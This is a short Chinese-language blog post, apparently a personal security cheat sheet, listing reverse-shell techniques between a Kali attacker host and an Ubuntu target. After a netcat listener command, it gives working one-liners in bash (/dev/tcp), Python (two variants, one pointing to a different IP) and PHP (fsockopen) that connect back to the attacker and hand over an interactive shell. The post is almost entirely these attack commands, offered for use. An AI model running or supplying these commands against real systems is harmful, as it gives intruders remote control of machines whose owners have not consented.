一些反弹shell方法
反弹shell方法
环境:
攻击: 192.168.188.63 (kali)
目标: 192.168.72.130 (ubuntu)
kali监听指定端口:
nc -lvp 1234
![1.png][1]
反弹shell:
ubuntu下
方法一 bash:
bash -i >& /dev/tcp/192.168.188.63/1234 0>&1
方法二 python:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.188.63",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.3.4",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
方法三 php:
php -r '$sock=fsockopen("192.168.188.63",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
[1]: uploads/2020/03/1972428766.png [1]: http://www.sumor.top/usr/uploads/2020/03/1972428766.png
评论